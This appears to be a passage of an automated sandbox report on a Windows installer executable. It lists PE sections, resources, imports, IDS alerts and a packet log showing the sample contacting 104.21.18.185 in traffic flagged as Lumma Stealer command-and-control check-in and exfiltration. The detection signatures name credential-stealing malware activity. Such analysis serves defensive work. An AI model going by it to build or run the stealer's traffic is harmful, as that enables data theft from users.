                                                                                                                    .text0x10000x2a910c0x2a92006ad4e2f6323b64299e4c17ab66f8feccunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .itext0x2ab0000x2e240x30004aadf43ce8bf8e2d71c98187b11e0b7dFalse0.4940592447916667data6.150722356110934IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .data0x2ae0000x9e180xa0009c5114b05054094107967068f16428b9False0.5979736328125data6.333690263645768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .bss0x2b80000x7cd00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .idata0x2c00000x3a6a0x3c00c255c35dc8b2afb5a1e8a0d53ec7a7b6False0.3244140625PDP-11 overlaid pure executable5.195700686476652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .didata0x2c40000xe280x1000eb38b8d680c9b49ddcbbfdf40683169fFalse0.311767578125data4.032868001403646IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .edata0x2c50000x6e0x20054166a993ddfc95afd7da99ac7579d19False0.173828125data1.3044245768916944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .tls0x2c60000x580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rdata0x2c70000x5d0x2002bd0b4250f44ecdcc366775e042632aaFalse0.189453125data1.3744124358228273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0x2c80000x3cd3c0x3ce002de232a3f06c3a1eeba5cacbcff66694False0.5653033560061602data6.732465801732527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0x3050000x806000x8060062db700ce516ef5554274056e110a413False0.5100052489045764data7.13026651814982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_CURSOR0x30620c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                    RT_CURSOR0x3063400x134dataEnglishUnited States0.4642857142857143
                                                                                                                    RT_CURSOR0x3064740x134dataEnglishUnited States0.4805194805194805
                                                                                                                    RT_CURSOR0x3065a80x134dataEnglishUnited States0.38311688311688313
                                                                                                                    RT_CURSOR0x3066dc0x134dataEnglishUnited States0.36038961038961037
                                                                                                                    RT_CURSOR0x3068100x134dataEnglishUnited States0.4090909090909091
                                                                                                                    RT_CURSOR0x3069440x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                    RT_ICON0x306a780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.04227680680207841
                                                                                                                    RT_ICON0x30aca00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.07157676348547717
                                                                                                                    RT_ICON0x30d2480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.08794559099437148
                                                                                                                    RT_ICON0x30e2f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.11891828058573453
                                                                                                                    RT_ICON0x3125180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.1578838174273859
                                                                                                                    RT_ICON0x314ac00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.010333018422295701
                                                                                                                    RT_ICON0x318ce80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.026763485477178422
                                                                                                                    RT_ICON0x31b2900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.02626641651031895
                                                                                                                    RT_ICON0x31c3380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.15806754221388367
                                                                                                                    RT_ICON0x31d3e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27172131147540984
                                                                                                                    RT_ICON0x31dd680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.350177304964539
                                                                                                                    RT_ICON0x31e1d00x3742PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9967481973702813
                                                                                                                    RT_ICON0x3219140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3323170731707317
                                                                                                                    RT_ICON0x321f7c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.4206989247311828
                                                                                                                    RT_ICON0x3222640x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5236486486486487
                                                                                                                    RT_ICON0x32238c0xc45PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8701050620821394
                                                                                                                    RT_ICON0x322fd40xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1455223880597015
                                                                                                                    RT_ICON0x323e7c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.1723826714801444
                                                                                                                    RT_ICON0x3247240x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.19508670520231214
                                                                                                                    RT_ICON0x324c8c0xc5cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8767383059418458
                                                                                                                    RT_ICON0x3258e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.07354771784232365
                                                                                                                    RT_ICON0x327e900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.0900562851782364
                                                                                                                    RT_ICON0x328f380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2154255319148936
                                                                                                                    RT_STRING0x3293a00x204data0.32945736434108525
                                                                                                                    RT_STRING0x3295a40x40cdata0.37258687258687256
                                                                                                                    RT_STRING0x3299b00x328data0.422029702970297
                                                                                                                    RT_STRING0x329cd80x24cdata0.467687074829932
                                                                                                                    RT_STRING0x329f240x350data0.4339622641509434
                                                                                                                    RT_STRING0x32a2740x330data0.40441176470588236
                                                                                                                    RT_STRING0x32a5a40x3bcdata0.42573221757322177
                                                                                                                    RT_STRING0x32a9600x9cdata0.717948717948718
                                                                                                                    RT_STRING0x32a9fc0x100data0.609375
                                                                                                                    RT_STRING0x32aafc0x448data0.38777372262773724
                                                                                                                    RT_STRING0x32af440x424data0.3632075471698113
                                                                                                                    RT_STRING0x32b3680x50cdata0.35294117647058826
                                                                                                                    RT_STRING0x32b8740x310data0.3227040816326531
                                                                                                                    RT_STRING0x32bb840x37cdata0.4327354260089686
                                                                                                                    RT_STRING0x32bf000x3a4data0.3959227467811159
                                                                                                                    RT_STRING0x32c2a40x480data0.3810763888888889
                                                                                                                    RT_STRING0x32c7240x3d4data0.35918367346938773
                                                                                                                    RT_STRING0x32caf80x454data0.3925992779783393
                                                                                                                    RT_STRING0x32cf4c0x1ecdata0.3983739837398374
                                                                                                                    RT_STRING0x32d1380xc4data0.6428571428571429
                                                                                                                    RT_STRING0x32d1fc0x170data0.5597826086956522
                                                                                                                    RT_STRING0x32d36c0x2dcdata0.43306010928961747
                                                                                                                    RT_STRING0x32d6480x3f0data0.34226190476190477
                                                                                                                    RT_STRING0x32da380x314data0.38578680203045684
                                                                                                                    RT_STRING0x32dd4c0x2f8data0.38026315789473686
                                                                                                                    RT_RCDATA0x32e0440x10data1.5
                                                                                                                    RT_RCDATA0x32e0540x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                    RT_RCDATA0x32f8540x148bPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0020916524054002
                                                                                                                    RT_RCDATA0x330ce00x111ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025102692834322
                                                                                                                    RT_RCDATA0x331e000xd8cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031718569780854
                                                                                                                    RT_RCDATA0x332b8c0xba8data0.5318364611260054
                                                                                                                    RT_RCDATA0x3337340x147Delphi compiled form 'TMainForm'0.746177370030581
                                                                                                                    RT_RCDATA0x33387c0x480Delphi compiled form 'TNewDiskForm'0.5052083333333334
                                                                                                                    RT_RCDATA0x333cfc0x400Delphi compiled form 'TSelectFolderForm'0.5087890625
                                                                                                                    RT_RCDATA0x3340fc0x4b5Delphi compiled form 'TSelectLanguageForm'0.5012448132780083
                                                                                                                    RT_RCDATA0x3345b40x7e3Delphi compiled form 'TUninstallProgressForm'0.40713224368499257
                                                                                                                    RT_RCDATA0x334d980x55cDelphi compiled form 'TUninstSharedFileForm'0.41690962099125367
                                                                                                                    RT_RCDATA0x3352f40x2ac9Delphi compiled form 'TWizardForm'0.19811923673879303
                                                                                                                    RT_GROUP_CURSOR0x337dc00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                    RT_GROUP_CURSOR0x337dd40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                    RT_GROUP_CURSOR0x337de80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                    RT_GROUP_CURSOR0x337dfc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                    RT_GROUP_CURSOR0x337e100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                    RT_GROUP_CURSOR0x337e240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                    RT_GROUP_CURSOR0x337e380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                    RT_GROUP_ICON0x337e4c0xaedataEnglishUnited States0.6379310344827587
                                                                                                                    RT_GROUP_ICON0x337efc0x30dataEnglishUnited States0.9375
                                                                                                                    RT_GROUP_ICON0x337f2c0x22dataEnglishUnited States1.0588235294117647
                                                                                                                    RT_GROUP_ICON0x337f500x30dataEnglishUnited States0.9375
                                                                                                                    RT_GROUP_ICON0x337f800x30dataEnglishUnited States0.9583333333333334
                                                                                                                    RT_VERSION0x337fb00x514dataEnglishUnited States0.3046153846153846
                                                                                                                    RT_MANIFEST0x3384c40x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3836734693877551
                                                                                                                    DLLImport
                                                                                                                    mpr.dllWNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
                                                                                                                    comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                    comctl32.dllFlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_DrawIndirect, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
                                                                                                                    shell32.dllSHBrowseForFolderW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, SHAppBarMessage, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
                                                                                                                    user32.dllMoveWindow, CopyImage, SetMenuItemInfoW, GetMenuItemInfoW, DefFrameProcW, ScrollWindowEx, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, SendMessageA, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, EnumChildWindows, SendNotifyMessageW, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, ExitWindowsEx, GetClassLongW, SetScrollRange, DrawTextW, CharToOemBuffA, PeekMessageA, MessageBeep, SetClassLongW, SetRectEmpty, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, SendMessageTimeoutW, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, ValidateRect, GetCursor, KillTimer, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateIconIndirect, CreateWindowExW, GetMessageW, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, MapVirtualKeyW, OffsetRect, IsWindowUnicode, DispatchMessageW, DefMDIChildProcW, WaitForInputIdle, GetSystemMenu, SetScrollPos, GetScrollPos, InflateRect, DrawFocusRect, ReleaseCapture, LoadCursorW, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, DestroyMenu, SetWindowsHookExW, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, GetKeyboardState, ScreenToClient, DrawFrameControl, BringWindowToTop, SetCursor, CreateIcon, RemoveMenu, AppendMenuW, GetKeyboardLayoutNameW, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, PostQuitMessage, ShowScrollBar, LoadImageW, EnableMenuItem, HideCaret, FindWindowExW, MonitorFromPoint, LoadIconW, SystemParametersInfoW, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, FindWindowW, GetKeyboardLayout, DeleteMenu
                                                                                                                    version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                                    oleaut32.dllSafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
                                                                                                                    advapi32.dllRegSetValueExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, GetUserNameW, RegQueryInfoKeyW, EqualSid, GetTokenInformation, RegCreateKeyExW, SetSecurityDescriptorDacl, RegEnumKeyExW, AdjustTokenPrivileges, RegDeleteKeyW, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, RegDeleteValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, ConvertSidToStringSidW, RegCloseKey, InitializeSecurityDescriptor
                                                                                                                    msvcrt.dllmemcpy
                                                                                                                    winhttp.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
                                                                                                                    kernel32.dllSetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, SetHandleInformation, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, GetProcessHeap, ExitProcess, HeapAlloc, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, PeekNamedPipe, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, EnumResourceNamesW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, CreatePipe, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                                                                                    ole32.dllStgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
                                                                                                                    gdi32.dllArc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries
                                                                                                                    NameOrdinalAddress
                                                                                                                    __dbk_fcall_wrapper20x411c18
                                                                                                                    dbkFCallWrapperAddr10x6bb648
                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishUnited States
                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-12-24T01:12:16.539512+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:17.295364+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:17.295364+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:18.574856+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:19.337254+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:19.337254+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:20.987785+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:22.279186+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449732104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:23.709376+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:26.423291+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:29.474434+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:31.599207+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:33.567801+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:34.346561+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449743104.21.18.185443TCP
                                                                                                                    2024-12-24T01:12:35.868046+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.27.229443TCP
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 24, 2024 01:12:15.307409048 CET49730443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:15.307442904 CET44349730104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:15.307528973 CET49730443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:15.310720921 CET49730443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:15.310733080 CET44349730104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:16.539370060 CET44349730104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:16.539511919 CET49730443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:16.546171904 CET49730443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:16.546181917 CET44349730104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:16.546392918 CET44349730104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:16.594480038 CET49730443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:16.634951115 CET49730443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:16.635009050 CET49730443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:16.635045052 CET44349730104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:17.295372963 CET44349730104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:17.295447111 CET44349730104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:17.295537949 CET49730443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:17.297163010 CET49730443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:17.297175884 CET44349730104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:17.297185898 CET49730443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:17.297189951 CET44349730104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:17.313227892 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:17.313313961 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:17.313425064 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:17.313669920 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:17.313705921 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:18.574697018 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:18.574856043 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:18.575901031 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:18.575930119 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:18.576145887 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:18.577122927 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:18.577162981 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:18.577199936 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.337261915 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.337397099 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.337420940 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.337471962 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.337515116 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.337584972 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.337966919 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.345371008 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.345391035 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.345444918 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.345467091 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.345532894 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.345546007 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.353903055 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.353975058 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.353992939 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.407000065 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.407017946 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.453943014 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.456876040 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.501624107 CET49731443192.168.2.4104.21.18.185
                                                                                                                    Dec 24, 2024 01:12:19.528964043 CET44349731104.21.18.185192.168.2.4
                                                                                                                    Dec 24, 2024 01:12:19.532923937 CET44349731104.21.18.185192.168.2.4
